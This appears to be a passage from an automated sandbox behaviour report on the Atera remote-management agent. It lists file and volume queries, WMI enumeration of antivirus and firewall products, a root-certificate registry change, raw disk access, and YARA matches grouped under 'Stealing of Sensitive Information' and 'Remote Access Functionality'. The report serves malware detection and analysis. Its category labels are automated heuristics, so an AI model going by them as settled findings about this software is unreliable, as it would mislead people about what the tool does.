                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ValueTuple\v4.0_4.0.0.0__cc7b13ffcd2ddd51\System.ValueTuple.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingPackageExtensions.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Services.Client\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Services.Client.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI5085.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI5085.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI5885.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI5885.tmp-\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Diagnostics.DiagnosticSource.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading.Tasks\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.Tasks.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Collections\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Collections.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Linq\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Linq.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ValueTuple\v4.0_4.0.0.0__cc7b13ffcd2ddd51\System.ValueTuple.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Threading\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Threading.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3ECC04 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,35_2_00007FFDEE3ECC04
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E85D4 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,_malloc_crt,_invoke_watson,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,35_2_00007FFDEE3E85D4
                                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiVirusProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiSpywareProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from FirewallProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                                Stealing of Sensitive Information

                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeDevice IO: \Device\Harddisk0\DR0

                                Remote Access Functionality

                                Source: Yara matchFile source: 44.0.AgentPackageTicketing.exe.214714d0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.AgentPackageAgentInformation.exe.15e7d2e0000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 47.0.AgentPackageInternalPoller.exe.22b81dc0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 49.2.AgentPackageProgramManagement.exe.153fd170000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.0.AgentPackageAgentInformation.exe.2156b880000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 57.0.AgentPackageSystemTools.exe.25fbf120000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.AteraAgent.exe.1779dac0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.2.AgentPackageMonitoring.exe.1f71cd60000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 42.0.AgentPackageUpgradeAgent.exe.22039cd0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 33.0.AgentPackageSTRemote.exe.2ef73bc0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 26.2.AteraAgent.exe.21630a3e188.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 26.2.AteraAgent.exe.216307ca9d0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 57.2.AgentPackageSystemTools.exe.25fbfa20000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 49.0.AgentPackageProgramManagement.exe.153fcb70000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.0.AgentPackageMonitoring.exe.1f71c980000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 26.2.AteraAgent.exe.216307e4c90.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C427D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2788069108.000002203A8E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2790839667.0000029E3B6D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002C.00000002.3063046700.0000021400062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000003.2164597390.0000021E96060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2967276692.00000153FCD4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2320145221.00000281BD92E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.0000021630D43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2695077269.0000029E21F52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.1999548038.0000024740890000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2624626748.000002EF00103000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.00000153802B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.0000021630B22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2454916097.0000022B9AE50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C42B9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2771051408.0000022039EF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.2835718988.00000153806B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2327349674.00000281BE1D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000003.2711792787.00000269218B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000003.2713795666.0000026922065000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2437952320.0000022B828B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2773209313.0000022039F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2297128226.0000021C42E23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1762296888.00000177B80E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000002.2773209313.0000022039F32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000002.2437952320.0000022B8269E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2327349674.00000281BE421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.1981546902.0000015E00079000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2683966868.0000021630D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002F.00000000.2379668284.0000022B81DC2000.00000002.00000001.01000000.0000002A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2905094619.000002164929A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.1982795635.0000015E7D03C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.2057309796.0000022F4BF90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000002.2292749286.000000AF46BD5000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2875938217.0000021648E51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
